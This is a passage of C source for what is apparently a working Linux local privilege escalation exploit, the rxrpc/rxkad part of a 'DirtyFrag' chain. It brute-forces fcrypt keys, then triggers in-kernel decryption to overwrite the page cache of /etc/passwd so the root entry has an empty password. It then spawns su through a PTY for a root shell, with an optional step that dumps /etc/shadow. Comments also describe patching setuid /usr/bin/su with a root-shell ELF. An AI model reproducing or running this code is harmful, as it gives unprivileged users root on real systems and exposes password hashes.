	0x47, 0xf6, 0x51, 0x36, 0xed, 0xf3, 0xb9, 0x1a, 0xa7, 0xdf, 0x29, 0x43, 0x01, 0x54, 0x70, 0xa4,
	0xbf, 0xd4, 0x0b, 0x53, 0x44, 0x60, 0x9e, 0x23, 0xa1, 0x18, 0x68, 0x4f, 0xf0, 0x2f, 0x82, 0xc2,
	0x2a, 0x41, 0xb2, 0x42, 0x0c, 0xed, 0x0c, 0x1d, 0x13, 0x3a, 0x3c, 0x6e, 0x35, 0xdc, 0x60, 0x65,
	0x85, 0xe9, 0x64, 0x02, 0x9a, 0x3f, 0x9f, 0x87, 0x96, 0xdf, 0xbe, 0xf2, 0xcb, 0xe5, 0x6c, 0xd4,
	0x5a, 0x83, 0xbf, 0x92, 0x1b, 0x94, 0x00, 0x42, 0xcf, 0x4b, 0x00, 0x75, 0xba, 0x8f, 0x76, 0x5f,
	0x5d, 0x3a, 0x4d, 0x09, 0x12, 0x08, 0x38, 0x95, 0x17, 0xe4, 0x01, 0x1d, 0x4c, 0xa9, 0xcc, 0x85,
	0x82, 0x4c, 0x9d, 0x2f, 0x3b, 0x66, 0xa1, 0x34, 0x10, 0xcd, 0x59, 0x89, 0xa5, 0x31, 0xcf, 0x05,
	0xc8, 0x84, 0xfa, 0xc7, 0xba, 0x4e, 0x8b, 0x1a, 0x19, 0xf1, 0xa1, 0x3b, 0x18, 0x12, 0x17, 0xb0,
	0x98, 0x8d, 0x0b, 0x23, 0xc3, 0x3a, 0x2d, 0x20, 0xdf, 0x13, 0xa0, 0xa8, 0x4c, 0x0d, 0x6c, 0x2f,
	0x47, 0x13, 0x13, 0x52, 0x1f, 0x2d, 0xf5, 0x79, 0x3d, 0xa2, 0x54, 0xbd, 0x69, 0xc8, 0x6b, 0xf3,
	0x05, 0x28, 0xf1, 0x16, 0x46, 0x40, 0xb0, 0x11, 0xd3, 0xb7, 0x95, 0x49, 0xcf, 0xc3, 0x1d, 0x8f,
	0xd8, 0xe1, 0x73, 0xdb, 0xad, 0xc8, 0xc9, 0xa9, 0xa1, 0xc2, 0xc5, 0xe3, 0xba, 0xfc, 0x0e, 0x25,
};

static uint32_t fc_sbox0[256], fc_sbox1[256], fc_sbox2[256], fc_sbox3[256];

#include <endian.h>

static void fcrypt_init_sboxes(void)
{
	for (int i = 0; i < 256; i++) {
		fc_sbox0[i] = htobe32((uint32_t)fc_sbox0_raw[i] << 3);
		fc_sbox1[i] = htobe32(((uint32_t)(fc_sbox1_raw[i] & 0x1f) << 27) |
				((uint32_t)fc_sbox1_raw[i] >> 5));
		fc_sbox2[i] = htobe32((uint32_t)fc_sbox2_raw[i] << 11);
		fc_sbox3[i] = htobe32((uint32_t)fc_sbox3_raw[i] << 19);
	}
}

#define fc_ror56_64(k, n) \
	(k = (k >> (n)) | ((k & ((1ULL << (n)) - 1)) << (56 - (n))))

typedef struct { uint32_t sched[16]; } fcrypt_uctx;

static void fcrypt_user_setkey(fcrypt_uctx *ctx, const uint8_t key[8])
{
	uint64_t k = 0;
	k  = (uint64_t)(key[0] >> 1);
	k <<= 7; k |= (uint64_t)(key[1] >> 1);
	k <<= 7; k |= (uint64_t)(key[2] >> 1);
	k <<= 7; k |= (uint64_t)(key[3] >> 1);
	k <<= 7; k |= (uint64_t)(key[4] >> 1);
	k <<= 7; k |= (uint64_t)(key[5] >> 1);
	k <<= 7; k |= (uint64_t)(key[6] >> 1);
	k <<= 7; k |= (uint64_t)(key[7] >> 1);

	ctx->sched[0x0] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x1] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x2] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x3] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x4] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x5] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x6] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x7] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x8] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0x9] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xa] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xb] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xc] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xd] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xe] = htobe32((uint32_t)k); fc_ror56_64(k, 11);
	ctx->sched[0xf] = htobe32((uint32_t)k);
}

#define FC_F(R_, L_, sched_) do {                                        \
	union { uint32_t l; uint8_t c[4]; } u;                               \
	u.l = (sched_) ^ (R_);                                               \
	L_ ^= fc_sbox0[u.c[0]] ^ fc_sbox1[u.c[1]] ^                          \
	fc_sbox2[u.c[2]] ^ fc_sbox3[u.c[3]];                           \
} while (0)

static void fcrypt_user_decrypt(const fcrypt_uctx *ctx,
		uint8_t out[8], const uint8_t in[8])
{
	uint32_t L, R;
	memcpy(&L, in, 4);
	memcpy(&R, in + 4, 4);
	FC_F(L, R, ctx->sched[0xf]);
	FC_F(R, L, ctx->sched[0xe]);
	FC_F(L, R, ctx->sched[0xd]);
	FC_F(R, L, ctx->sched[0xc]);
	FC_F(L, R, ctx->sched[0xb]);
	FC_F(R, L, ctx->sched[0xa]);
	FC_F(L, R, ctx->sched[0x9]);
	FC_F(R, L, ctx->sched[0x8]);
	FC_F(L, R, ctx->sched[0x7]);
	FC_F(R, L, ctx->sched[0x6]);
	FC_F(L, R, ctx->sched[0x5]);
	FC_F(R, L, ctx->sched[0x4]);
	FC_F(L, R, ctx->sched[0x3]);
	FC_F(R, L, ctx->sched[0x2]);
	FC_F(L, R, ctx->sched[0x1]);
	FC_F(R, L, ctx->sched[0x0]);
	memcpy(out, &L, 4);
	memcpy(out + 4, &R, 4);
}

/* For the 2-splice chain we want the line to have EXACTLY 6 ':' and a
 * shell field that equals "/bin/bash" (in /etc/shells, valid path).
 * The two splices interlock as:
 *
 *   bytes 7..14  (offset 2800): P1 — sets uid=0, gid=1 digit, then
 *                4 random gecos-prefix bytes.
 *   bytes 15..22 (offset 2808): P2 — wipes the original ':' at line
 *                pos 16, preserves ':' at pos 21 and '/' at pos 22.
 *
 *   Combined line: "test:x:0:G:GGGGGGGGGG:/home/test:/bin/bash"
 *                   pos 0    8    21       32
 *
 *   pw_uid=0, pw_gid=G, pw_dir="/home/test", pw_shell="/bin/bash".
 *   Now `su -s /bin/bash test` proceeds through the restricted_shell()
 *   check (because /bin/bash IS in /etc/shells) and exec()s /bin/bash
 *   under uid=0.
 *
 * === 3-splice predicates ===
 *
 * After applying splices A, B, C in order to /etc/passwd line 1
 * (offsets 4, 6, 8 — each 8 bytes, last-write-wins), the final state
 * of chars 4..15 is determined by these P bytes:
 *
 *   char 4  = P_A[0]   want: ':'
 *   char 5  = P_A[1]   want: ':'
 *   char 6  = P_B[0]   want: '0'   (overwrites P_A[2])
 *   char 7  = P_B[1]   want: ':'   (overwrites P_A[3])
 *   char 8  = P_C[0]   want: '0'   (overwrites P_A[4]/P_B[2])
 *   char 9  = P_C[1]   want: ':'   (overwrites P_A[5]/P_B[3])
 *   char 10..14 = P_C[2..6]  want: any byte except ':' '\0' '\n'
 *   char 15 = P_C[7]   want: ':'
 *
 * The constraints on P_A[2..7] and P_B[2..7] are vacuous because they
 * are overwritten before /etc/passwd is read by anyone — we only care
 * about the final state. */
static inline int fc_check_pa_nullok(const uint8_t P[8])
{
	return P[0] == ':' && P[1] == ':';
}

static inline int fc_check_pb_nullok(const uint8_t P[8])
{
	return P[0] == '0' && P[1] == ':';
}

static inline int fc_check_pc_nullok(const uint8_t P[8])
{
	if (P[0] != '0') return 0;
	if (P[1] != ':') return 0;
	if (P[7] != ':') return 0;
	for (int i = 2; i < 7; i++) {
		if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return 0;
	}
	return 1;
}
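
/* Worked hit-rate estimate for the three predicates above.  This is a
 * back-of-the-envelope sketch that assumes the decrypted block behaves
 * like 8 uniformly random bytes as K varies (a heuristic assumption, not
 * a proven property of fcrypt):
 *
 *   p_A = p_B = (1/256)^2                 = 2^-16  ~ 1.5e-5
 *   p_C       = (1/256)^3 * (253/256)^5            ~ 5.6e-8
 *
 * p_C has three fixed bytes (P[0], P[1], P[7]) and five bytes that may
 * take any of 253 of the 256 values.  The expected number of keys tried
 * is 1/p: about 6.6e4 for A and B, and about 1.8e7 for C. */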

static uint64_t fc_splitmix64(uint64_t *s)
{
	uint64_t z = (*s += 0x9E3779B97F4A7C15ULL);
	z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
	z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
	return z ^ (z >> 31);
}

/* Generic brute-force.  `predicate` decides if a P is acceptable. */
typedef int (*pcheck_fn)(const uint8_t P[8]);

static int find_K_offline_generic(const uint8_t C[8], uint64_t max_iters,
		pcheck_fn check,
		uint8_t K_out[8], uint8_t P_out[8],
		uint64_t seed_init,
		const char *label)
{
	fcrypt_uctx ctx;
	uint8_t K[8], P[8];
	uint64_t seed = seed_init;
	struct timespec ts0, ts1;
	clock_gettime(CLOCK_MONOTONIC, &ts0);

	for (uint64_t iter = 0; iter < max_iters; iter++) {
		uint64_t r = fc_splitmix64(&seed);
		memcpy(K, &r, 8);
		fcrypt_user_setkey(&ctx, K);
		fcrypt_user_decrypt(&ctx, P, C);

		if (check(P)) {
			memcpy(K_out, K, 8);
			memcpy(P_out, P, 8);
			clock_gettime(CLOCK_MONOTONIC, &ts1);
			double dt = (ts1.tv_sec - ts0.tv_sec) +
				(ts1.tv_nsec - ts0.tv_nsec) / 1e9;
			LOG("%s found after %lu iters in %.2fs (%.2fM/s) K=%02x%02x%02x%02x%02x%02x%02x%02x  P=%02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
					label,
					(unsigned long)iter, dt, iter / dt / 1e6,
					K[0],K[1],K[2],K[3],K[4],K[5],K[6],K[7],
					P[0],P[1],P[2],P[3],P[4],P[5],P[6],P[7],
					(P[0]>=32&&P[0]<127)?P[0]:'.',
					(P[1]>=32&&P[1]<127)?P[1]:'.',
					(P[2]>=32&&P[2]<127)?P[2]:'.',
					(P[3]>=32&&P[3]<127)?P[3]:'.',
					(P[4]>=32&&P[4]<127)?P[4]:'.',
					(P[5]>=32&&P[5]<127)?P[5]:'.',
					(P[6]>=32&&P[6]<127)?P[6]:'.',
					(P[7]>=32&&P[7]<127)?P[7]:'.');
			return 0;
		}

		if ((iter & 0x3ffffff) == 0 && iter > 0) {
			clock_gettime(CLOCK_MONOTONIC, &ts1);
			double dt = (ts1.tv_sec - ts0.tv_sec) +
				(ts1.tv_nsec - ts0.tv_nsec) / 1e9;
			fprintf(stderr, "  [%s %.1fs] iter=%lu (%.2fM/s)\n",
					label, dt, (unsigned long)iter, iter / dt / 1e6);
		}
	}
	return -1;
}


int rxrpc_lpe_main(int argc, char **argv)
{
	fprintf(stderr, "\n=== rxrpc/rxkad LPE EXPLOIT (uid=1000 → root) ===\n");
	fprintf(stderr, "[*] uid=%u euid=%u gid=%u\n",
			getuid(), geteuid(), getgid());

	{
		const char *no_unshare = getenv("POC_NO_UNSHARE");
		if (!no_unshare || *no_unshare != '1') {
			const char *do_unshare = getenv("POC_UNSHARE");
			if (do_unshare && *do_unshare == '1') {
				if (do_unshare_userns_netns() < 0) return 1;
			}
		}
	}

	/* Open a dummy AF_RXRPC socket to autoload the rxrpc kernel module.
	 * Without this, the first add_key("rxrpc", ...) call fails with ENODEV
	 * because the kernel key type "rxrpc" is registered by rxrpc_init() in
	 * the module load path. */
	{
		int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET);
		if (dummy < 0) {
			WARN("socket(AF_RXRPC): %s — module not loadable?", strerror(errno));
			return 1;
		}
		close(dummy);
		LOG("rxrpc module autoloaded via dummy socket(AF_RXRPC)");
	}

	/* Open /etc/passwd RO and mmap the first page (which contains the
	 * root entry on line 1). */
	const char *target_path = getenv("POC_TARGET_FILE");
	if (!target_path || !*target_path) target_path = "/etc/passwd";

	int rfd_ro = open(target_path, O_RDONLY);
	if (rfd_ro < 0) {
		WARN("open %s RO: %s", target_path, strerror(errno));
		return 1;
	}
	struct stat st;
	fstat(rfd_ro, &st);
	if (st.st_size < 32) { WARN("target too small: %lld", (long long)st.st_size); return 1; }
	LOG("target %s opened RO, size=%lld, uid=%u gid=%u mode=%04o",
			target_path, (long long)st.st_size, st.st_uid, st.st_gid,
			st.st_mode & 07777);

	/* mmap first page so the page-cache page stays pinned. */
	void *map = mmap(NULL, 4096, PROT_READ, MAP_SHARED, rfd_ro, 0);
	if (map == MAP_FAILED) { WARN("mmap: %s", strerror(errno)); return 1; }
	LOG("mmap'd %s page-cache at %p (PROT_READ|MAP_SHARED)", target_path, map);

	/* If a previous attempt already left the root entry in the patched
	 * "root::0:0:..." form, treat as success and skip the brute-force /
	 * trigger stages.  Otherwise proceed regardless of current state —
	 * the brute-force re-derives K_A/K_B/K_C from whatever bytes are
	 * currently at offsets 4/6/8 of the page-cache page, so it works
	 * even on the corrupt residue from a previous failed run. */
	{
		const char *m = (const char *)map;
		if (memcmp(m, "root::0:0", 9) == 0) {
			LOG("/etc/passwd already patched (root::0:0...) — nothing to do");
			return 0;
		}
		LOG("/etc/passwd line 1 first 16 bytes:");
		for (int i = 0; i < 16; i++)
			fprintf(stderr, "%02x ", (uint8_t)m[i]);
		fprintf(stderr, "\n");
	}
	fprintf(stderr, "[*] /etc/passwd line 1 (root entry) BEFORE: '");
	for (int i = 0; i < 32; i++) {
		char c = ((const char *)map)[i];
		fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr);
	}
	fprintf(stderr, "'\n");

	/* === STAGE 1 — THREE-SPLICE OFFLINE BRUTE FORCE ===
	 *
	 * Read THREE 8-byte ciphertexts at file offsets 4, 6, 8.  Search
	 * independently for K_A (chars 4-5 = "::"), K_B (chars 6-7 = "0:"),
	 * K_C (chars 8-15 = "0:GGGGG:", G being any byte other than ':',
	 * '\0' or '\n').  All searches
	 * are user-space only — no kernel/VM interaction.
	 *
	 * Last-write-wins ordering: trigger A first (covers 4..11), then B
	 * (covers 6..13 — overrides A's 6..11), then C (covers 8..15 —
	 * overrides A's 8..11 and B's 8..13).  Final state of chars 4..15:
	 *   chars 4..5  = P_A[0..1]
	 *   chars 6..7  = P_B[0..1]
	 *   chars 8..15 = P_C[0..7]
	 * =================================================================*/
	uint8_t Ca[8], Cb[8], Cc[8];
	int off_a = 4, off_b = 6, off_c = 8;
	if (pread(rfd_ro, Ca, 8, off_a) != 8) { WARN("pread Ca: %s", strerror(errno)); return 1; }
	if (pread(rfd_ro, Cb, 8, off_b) != 8) { WARN("pread Cb: %s", strerror(errno)); return 1; }
	if (pread(rfd_ro, Cc, 8, off_c) != 8) { WARN("pread Cc: %s", strerror(errno)); return 1; }

	LOG("Ca @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
			off_a, Ca[0],Ca[1],Ca[2],Ca[3],Ca[4],Ca[5],Ca[6],Ca[7],
			(Ca[0]>=32&&Ca[0]<127)?Ca[0]:'.', (Ca[1]>=32&&Ca[1]<127)?Ca[1]:'.',
			(Ca[2]>=32&&Ca[2]<127)?Ca[2]:'.', (Ca[3]>=32&&Ca[3]<127)?Ca[3]:'.',
			(Ca[4]>=32&&Ca[4]<127)?Ca[4]:'.', (Ca[5]>=32&&Ca[5]<127)?Ca[5]:'.',
			(Ca[6]>=32&&Ca[6]<127)?Ca[6]:'.', (Ca[7]>=32&&Ca[7]<127)?Ca[7]:'.');
	LOG("Cb @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
			off_b, Cb[0],Cb[1],Cb[2],Cb[3],Cb[4],Cb[5],Cb[6],Cb[7],
			(Cb[0]>=32&&Cb[0]<127)?Cb[0]:'.', (Cb[1]>=32&&Cb[1]<127)?Cb[1]:'.',
			(Cb[2]>=32&&Cb[2]<127)?Cb[2]:'.', (Cb[3]>=32&&Cb[3]<127)?Cb[3]:'.',
			(Cb[4]>=32&&Cb[4]<127)?Cb[4]:'.', (Cb[5]>=32&&Cb[5]<127)?Cb[5]:'.',
			(Cb[6]>=32&&Cb[6]<127)?Cb[6]:'.', (Cb[7]>=32&&Cb[7]<127)?Cb[7]:'.');
	LOG("Cc @ %d: %02x%02x%02x%02x%02x%02x%02x%02x \"%c%c%c%c%c%c%c%c\"",
			off_c, Cc[0],Cc[1],Cc[2],Cc[3],Cc[4],Cc[5],Cc[6],Cc[7],
			(Cc[0]>=32&&Cc[0]<127)?Cc[0]:'.', (Cc[1]>=32&&Cc[1]<127)?Cc[1]:'.',
			(Cc[2]>=32&&Cc[2]<127)?Cc[2]:'.', (Cc[3]>=32&&Cc[3]<127)?Cc[3]:'.',
			(Cc[4]>=32&&Cc[4]<127)?Cc[4]:'.', (Cc[5]>=32&&Cc[5]<127)?Cc[5]:'.',
			(Cc[6]>=32&&Cc[6]<127)?Cc[6]:'.', (Cc[7]>=32&&Cc[7]<127)?Cc[7]:'.');

	fcrypt_init_sboxes();
	/* selftest */
	{
		fcrypt_uctx ctx;
		uint8_t z[8] = {0};
		uint8_t cv[8] = { 0x0E, 0x09, 0x00, 0xC7, 0x3E, 0xF7, 0xED, 0x41 };
		uint8_t pv[8];
		fcrypt_user_setkey(&ctx, z);
		fcrypt_user_decrypt(&ctx, pv, cv);
		if (memcmp(pv, z, 8) != 0) { WARN("fcrypt selftest FAILED"); return 1; }
	}
	LOG("fcrypt selftest OK");

	uint8_t Ka[8], Pa_out[8];
	uint8_t Kb[8], Pb_out[8];
	uint8_t Kc[8], Pc_out[8];
	uint8_t Cb_actual[8], Cc_actual[8];

	{
		uint64_t max_iters = 10000000000ULL;
		const char *e = getenv("LPE_MAX_ITERS");
		if (e) max_iters = strtoull(e, NULL, 0);
		uint64_t seed_base = (uint64_t)time(NULL) * 0x100000001ULL ^ (uint64_t)getpid();
		const char *se = getenv("LPE_SEED");
		if (se) seed_base = strtoull(se, NULL, 0);

		fprintf(stderr, "\n=== STAGE 1a: search K_A (chars 4-5 := \"::\")  prob ~1.5e-5 ===\n");
		if (find_K_offline_generic(Ca, max_iters, fc_check_pa_nullok,
					Ka, Pa_out, seed_base, "K_A") != 0) {
			WARN("K_A search exhausted"); return 2;
		}

		/* After splice A is applied, the ciphertext that splice B will
		 * see at file offset 6 is NOT the original Cb — it's the bytes
		 * that splice A wrote to file offsets 6..11 (= Pa[2..7]) plus
		 * the original bytes 12..13 (= Cb[6..7]).  We must derive
		 * Cb_actual and search K_B against it. */
		memcpy(Cb_actual, Pa_out + 2, 6);
		memcpy(Cb_actual + 6, Cb + 6, 2);
		LOG("Cb_actual (after splice A) = %02x%02x%02x%02x%02x%02x%02x%02x",
				Cb_actual[0],Cb_actual[1],Cb_actual[2],Cb_actual[3],
				Cb_actual[4],Cb_actual[5],Cb_actual[6],Cb_actual[7]);

		fprintf(stderr, "\n=== STAGE 1b: search K_B (chars 6-7 := \"0:\")  prob ~1.5e-5 ===\n");
		if (find_K_offline_generic(Cb_actual, max_iters, fc_check_pb_nullok,
					Kb, Pb_out, seed_base ^ 0xa5a5a5a5a5a5a5a5ULL,
					"K_B") != 0) {
			WARN("K_B search exhausted"); return 2;
		}

		/* Same chaining logic for splice C: after splice B, file offsets
		 * 8..13 hold Pb[2..7]; offsets 14..15 still hold the original
		 * bytes Cc[6..7]. */
		memcpy(Cc_actual, Pb_out + 2, 6);
		memcpy(Cc_actual + 6, Cc + 6, 2);
		LOG("Cc_actual (after splice B) = %02x%02x%02x%02x%02x%02x%02x%02x",
				Cc_actual[0],Cc_actual[1],Cc_actual[2],Cc_actual[3],
				Cc_actual[4],Cc_actual[5],Cc_actual[6],Cc_actual[7]);

		fprintf(stderr, "\n=== STAGE 1c: search K_C (chars 8-15 := \"0:GGGGG:\")  prob ~5.6e-8 ===\n");
		if (find_K_offline_generic(Cc_actual, max_iters, fc_check_pc_nullok,
					Kc, Pc_out, seed_base ^ 0x5a5a5a5a5a5a5a5aULL,
					"K_C") != 0) {
			WARN("K_C search exhausted"); return 2;
		}
	}

	fprintf(stderr, "\n[+] Predicted post-corruption /etc/passwd line 1:\n    \"root");
	/* chars 4-5 from P_A */
	for (int i = 0; i < 2; i++) fputc((Pa_out[i]>=32&&Pa_out[i]<127)?Pa_out[i]:'.', stderr);
	/* chars 6-7 from P_B */
	for (int i = 0; i < 2; i++) fputc((Pb_out[i]>=32&&Pb_out[i]<127)?Pb_out[i]:'.', stderr);
	/* chars 8-15 from P_C */
	for (int i = 0; i < 8; i++) fputc((Pc_out[i]>=32&&Pc_out[i]<127)?Pc_out[i]:'.', stderr);
	fprintf(stderr, "/root:/bin/bash\"\n");

	/* === STAGE 2 — THREE KERNEL TRIGGERS (in order A → B → C) ===
	 * Each trigger does a single in-place decrypt at the
	 * indicated /etc/passwd file offset.  Last-write-wins on overlapping
	 * bytes determines the final state.
	 */
	fprintf(stderr, "\n=== STAGE 2a: kernel trigger A @ off %d (set chars 4-5 \"::\") ===\n", off_a);
	memcpy(SESSION_KEY, Ka, 8);
	if (do_one_trigger(rfd_ro, off_a, 8) < 0) {
		WARN("kernel trigger A failed"); return 3;
	}

	fprintf(stderr, "\n=== STAGE 2b: kernel trigger B @ off %d (set chars 6-7 \"0:\") ===\n", off_b);
	memcpy(SESSION_KEY, Kb, 8);
	if (do_one_trigger(rfd_ro, off_b, 8) < 0) {
		WARN("kernel trigger B failed"); return 3;
	}

	fprintf(stderr, "\n=== STAGE 2c: kernel trigger C @ off %d (set chars 8-15 \"0:GGGGG:\") ===\n", off_c);
	memcpy(SESSION_KEY, Kc, 8);
	if (do_one_trigger(rfd_ro, off_c, 8) < 0) {
		WARN("kernel trigger C failed"); return 3;
	}

	/* Verify: re-read line 1 of /etc/passwd via mmap. */
	fprintf(stderr, "[*] /etc/passwd line 1 (root entry) AFTER:  '");
	for (int i = 0; i < 32; i++) {
		char c = ((const char *)map)[i];
		fputc((c == '\n') ? '$' : (c >= 32 && c < 127 ? c : '.'), stderr);
	}
	fprintf(stderr, "'\n");

	/* Sanity-check: chars 4-5 = "::", 6-7 = "0:", 8-9 = "0:", 15 = ':'. */
	{
		const char *m = (const char *)map;
		int ok = (m[4] == ':' && m[5] == ':' &&
				m[6] == '0' && m[7] == ':' &&
				m[8] == '0' && m[9] == ':' &&
				m[15] == ':');
		if (!ok) {
			WARN("post-trigger sanity check failed — char layout off");
			return 4;
		}
	}
	fprintf(stderr,
			"\n[!!!] HIT — root entry now has empty passwd field, uid=0, "
			"gid=0, dir=/root, shell=/bin/bash.\n");

	/* === STAGE 3 — VERIFY VIA getent passwd root === */
	fprintf(stderr,
			"\n=== STAGE 3: independent verify via `getent passwd root` ===\n");
	{
		int p[2];
		if (pipe(p) == 0) {
			pid_t pid = fork();
			if (pid == 0) {
				close(p[0]);
				dup2(p[1], 1);
				dup2(p[1], 2);
				close(p[1]);
				execlp("getent", "getent", "passwd", "root", NULL);
				_exit(127);
			}
			close(p[1]);
			char buf[1024];
			ssize_t r = read(p[0], buf, sizeof(buf) - 1);
			close(p[0]);
			int wstatus = 0;
			waitpid(pid, &wstatus, 0);
			if (r > 0) {
				buf[r] = 0;
				fprintf(stderr, "[getent passwd root] %s", buf);
			}
			fprintf(stderr,
					"[+] PRIMITIVE proven: root entry has empty passwd field "
					"via NSS.\n");
		}
	}

	/* Honour `--corrupt-only` arg or DIRTYFRAG_CORRUPT_ONLY=1 env so
	 * the chain wrapper can skip the in-process su PTY stage and exec
	 * /usr/bin/su itself.  Avoids the flaky posix_openpt bridge. */
	{
		int co_flag = 0;
		for (int i = 1; i < argc; i++)
			if (!strcmp(argv[i], "--corrupt-only")) { co_flag = 1; break; }
		const char *e = getenv("DIRTYFRAG_CORRUPT_ONLY");
		if (e && *e == '1') co_flag = 1;
		if (co_flag) return 0;
	}

	/* === STAGE 4 — `su` (target=root, no password input) ===
	 * PAM common-auth contains "auth [success=2 default=ignore]
	 * pam_unix.so nullok" — so a target user with empty passwd field
	 * + nullok flag accepts an empty password.  We auto-inject a
	 * single newline on the "Password:" prompt and then bridge the
	 * resulting bash to the user's tty. */
	fprintf(stderr,
			"\n=== STAGE 4: spawning interactive root shell via `su` "
			"(no password input needed) ===\n\n");
	fflush(stderr);

	int master = posix_openpt(O_RDWR | O_NOCTTY);
	if (master < 0 || grantpt(master) < 0 || unlockpt(master) < 0) {
		WARN("posix_openpt: %s", strerror(errno));
		return 5;
	}
	char *slave_name = ptsname(master);

	struct winsize ws;
	if (ioctl(STDIN_FILENO, TIOCGWINSZ, &ws) == 0) {
		ioctl(master, TIOCSWINSZ, &ws);
	}

	pid_t pid = fork();
	if (pid < 0) { WARN("fork: %s", strerror(errno)); return 5; }
	if (pid == 0) {
		/* child */
		setsid();
		int slave = open(slave_name, O_RDWR);
		if (slave < 0) _exit(127);
		ioctl(slave, TIOCSCTTY, 0);
		dup2(slave, 0); dup2(slave, 1); dup2(slave, 2);
		if (slave > 2) close(slave);
		close(master);
		/* `su` with no args targets root.  PAM common-auth's pam_unix.so
		 * nullok accepts the empty passwd we planted in /etc/passwd. */
		execlp("su", "su", NULL);
		_exit(127);
	}

	/* parent: bridge user's tty <-> master. */
	struct termios saved_termios;
	int saved_termios_ok = (tcgetattr(STDIN_FILENO, &saved_termios) == 0);
	if (saved_termios_ok) {
		struct termios raw = saved_termios;
		cfmakeraw(&raw);
		tcsetattr(STDIN_FILENO, TCSANOW, &raw);
	}

	int auto_pw_sent = 0;
	int stdin_eof = 0;          /* set when stdin closes (e.g. /dev/null) */
	char buf[4096];
	/* If LPE_AUTO_VERIFY=1 is set, the bridge will inject
	 * `id; whoami; exit\n` so it can prove uid=0 non-interactively
	 * (e.g. when stdin is /dev/null in CI). */
	int auto_verify = 0;
	{
		const char *e = getenv("LPE_AUTO_VERIFY");
		if (e && *e == '1') auto_verify = 1;
	}
	int verify_sent = 0;
	int total_ms = 0;
	for (;;) {
		struct pollfd pfds[2] = {
			{ stdin_eof ? -1 : STDIN_FILENO, POLLIN, 0 },
			{ master,       POLLIN, 0 },
		};
		int pr = poll(pfds, 2, 200);
		if (pr < 0 && errno != EINTR) break;
		total_ms += 200;

		if (pfds[1].revents & POLLIN) {
			ssize_t n = read(master, buf, sizeof(buf));
			if (n <= 0) break;
			(void)write(STDOUT_FILENO, buf, n);
			if (!auto_pw_sent && (size_t)n < sizeof(buf)) {
				buf[n] = 0;
				if (strstr(buf, "Password") || strstr(buf, "password")) {
					/* Empty password — PAM nullok will accept it.
					 * (When pam_unix sees an empty passwd field plus
					 * nullok it skips the prompt entirely; this branch
					 * handles the case where some other PAM module
					 * prints a prompt anyway.) */
					(void)write(master, "\n", 1);
					auto_pw_sent = 1;
				}
			}
		}
		if (!stdin_eof && (pfds[0].revents & POLLIN)) {
			ssize_t n = read(STDIN_FILENO, buf, sizeof(buf));
			if (n <= 0) {
				/* stdin EOF — stop reading from it but keep bridging
				 * master → stdout so su can still finish auth and run
				 * the optional auto-verify command. */
				stdin_eof = 1;
			} else {
				(void)write(master, buf, n);
			}
		}
		if (pfds[1].revents & (POLLHUP | POLLERR)) break;

		/* Auto-verify: ~1 s after spawn, send `id; whoami; exit\n` so
		 * the bridge captures uid=0 evidence non-interactively even
		 * when pam_unix's blank-passwd path skips the prompt. */
		if (auto_verify && !verify_sent && total_ms >= 1000) {
			const char cmd[] = "id; whoami; cat /etc/shadow | head -2; exit\n";
			(void)write(master, cmd, sizeof(cmd) - 1);
			verify_sent = 1;
		}

		int status;
		pid_t w = waitpid(pid, &status, WNOHANG);
		if (w == pid) {
			for (int i = 0; i < 5; i++) {
				struct pollfd pf = { master, POLLIN, 0 };
				if (poll(&pf, 1, 50) <= 0) break;
				ssize_t n = read(master, buf, sizeof(buf));
				if (n <= 0) break;
				(void)write(STDOUT_FILENO, buf, n);
			}
			break;
		}
	}
	if (saved_termios_ok) {
		tcsetattr(STDIN_FILENO, TCSANOW, &saved_termios);
	}
	close(master);
	return 0;
}
/*
 * DirtyFrag chain — uid=1000 → root.
 *
 * 1. ESP path  (authencesn AF_ALG --corrupt-only): overwrites the first
 *    160 bytes of /usr/bin/su's page-cache with a static x86_64 root-
 *    shell ELF.  Works on every distro tested regardless of PAM nullok
 *    or /etc/passwd contents — once invoked, the patched setuid-root
 *    /usr/bin/su just execs /bin/sh as uid 0.
 *
 * 2. rxrpc path  (Ubuntu fallback): if AF_ALG is sandboxed and the ESP
 *    path can't reach the page cache, fall back to the rxrpc/rxkad
 *    nullok primitive that patches /etc/passwd's root entry empty.
 *    PAM nullok then accepts the empty password during `su -`.
 *
 * 3. Once either target is corrupted, spawn `/usr/bin/su -` inside a
 *    fresh PTY and bridge the user's tty to it.  The bridge handles
 *    both the patched-su (no PAM at all) and the patched-passwd (PAM
 *    nullok) cases uniformly, and works even when the caller is in a
 *    background process group of an ssh-allocated PTY.
 *
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <termios.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdint.h>

extern int su_lpe_main(int argc, char **argv);
extern int rxrpc_lpe_main(int argc, char **argv);

/*
